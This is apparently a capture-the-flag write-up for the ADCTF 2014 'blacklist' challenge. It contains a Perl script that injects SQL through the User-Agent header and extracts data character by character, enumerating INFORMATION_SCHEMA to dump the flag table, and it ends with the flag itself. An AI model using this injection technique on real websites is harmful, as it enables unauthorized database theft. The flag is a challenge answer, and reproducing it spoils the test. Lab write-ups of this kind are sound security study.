blacklist
問題
We have stupid blacklist. The flag is in flag table.
blacklist.adctf2014.katsudon.org
メモ
解法
行番号表示/非表示切替
1 use strict;
2 use warnings;
3
4 my $url = "http://blacklist.adctf2014.katsudon.org/";
5
6 sub system_pipe {
7 my @args = @_;
8 open my $pipe, "-|", @args or return;
9 my @result = <$pipe>;
10 join "", @result;
11 }
12
13 sub extract_count_rows {
14 my $from = shift;
15 my $where = shift;
16
17 my $where_clause;
18 if ($where) { $where_clause = "WHERE $where" }
19 else { $where_clause = "" }
20
21 sleep 1;
22 my $ua = "0' + (SELECT COUNT(*) FROM $from $where_clause) + '";
23 my $result = system_pipe "curl", "-s", "-A", $ua, $url;
24 if ($result =~ /<li>.*?"(.*?)"/) {
25 return int($1);
26 }
27 else { die }
28 }
29
30 sub extract_length {
31 my $row_at = shift;
32 my $column = shift;
33 my $from = shift;
34 my $where = shift;
35
36 my $where_clause;
37 if ($where) { $where_clause = "WHERE $where" }
38 else { $where_clause = "" }
39
40 sleep 1;
41 my $ua = "0' + (SELECT LENGTH($column) FROM $from $where_clause LIMIT $row_at,1) + '";
42 #print $ua, "\n";
43 my $result = system_pipe "curl", "-s", "-A", $ua, $url;
44 if ($result =~ /<li>.*?"(.*?)"/) {
45 #print $&, "\n";
46 return int($1);
47 }
48 else { die }
49 }
50
51 sub extract_char {
52 my $row_at = shift;
53 my $char_at = shift;
54 my $column = shift;
55 my $from = shift;
56 my $where = shift;
57
58 my $where_clause;
59 if ($where) { $where_clause = "WHERE $where" }
60 else { $where_clause = "" }
61 $char_at++;
62
63 sleep 1;
64 my $ua = "0' + (SELECT ORD(SUBSTR($column, $char_at, 1)) FROM $from $where_clause LIMIT $row_at,1) + '";
65 #print $ua, "\n";
66 my $result = system_pipe "curl", "-s", "-A", $ua, $url;
67 if ($result =~ /<li>.*?"(.*?)"/) {
68 #print $&, "\n";
69 return chr($1);
70 }
71 else { die }
72 }
73
74 sub extract {
75 my $column = shift;
76 my $table = shift;
77 my $where = shift;
78 my @result;
79 my $nrows = extract_count_rows($table, $where);
80 for my $r (0..$nrows-1) {
81 my $s = "";
82 my $length = extract_length($r, $column, $table, $where);
83 for my $i (0..$length-1) {
84 $s .= extract_char($r, $i, $column, $table, $where);
85 }
86 push @result, $s;
87 }
88 return @result;
89 }
90
91 =comment
92 print "$_\n"
93 for extract("SCHEMA_NAME", "INFORMATION_SCHEMA.SCHEMATA");
94 =comment
95 information_schema
96 blacklist
97 =cut
98
99 =comment
100 print "$_\n"
101 for extract("TABLE_NAME", "INFORMATION_SCHEMA.TABLES",
102 "TABLE_SCHEMA='blacklist'");
103 =comment
104 access_log
105 flag
106 =cut
107
108 =comment
109 print "$_\n"
110 for extract("COLUMN_NAME", "INFORMATION_SCHEMA.COLUMNS",
111 "TABLE_SCHEMA='blacklist' AND TABLE_NAME='flag'");
112 =comment
113 flag is here!!!
114 =cut
115
116 print "$_\n" for extract("`flag is here!!!`", "blacklist.flag", "");
117 # ADCTF_d0_NoT_Us3_FUcK1N_8l4ckL1sT
